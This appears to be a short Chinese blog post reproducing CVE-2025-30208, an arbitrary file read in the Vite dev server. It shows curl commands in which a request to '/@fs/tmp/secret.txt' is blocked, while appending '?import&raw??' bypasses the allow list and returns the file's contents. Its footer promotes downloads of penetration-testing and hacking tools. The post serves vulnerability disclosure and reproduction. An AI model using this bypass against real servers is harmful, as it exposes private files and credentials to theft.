正文

vite 任意文件读取漏洞 CVE-2025-30208

admin
admin V管理员 /0 评论 /31 阅读
0327
此篇文章发布距今已超过3天,您需要注意文章的内容或图片是否可用!

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret contentn"
//# sourceMappingURL=data:application/json;base64,eyJ2...


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下网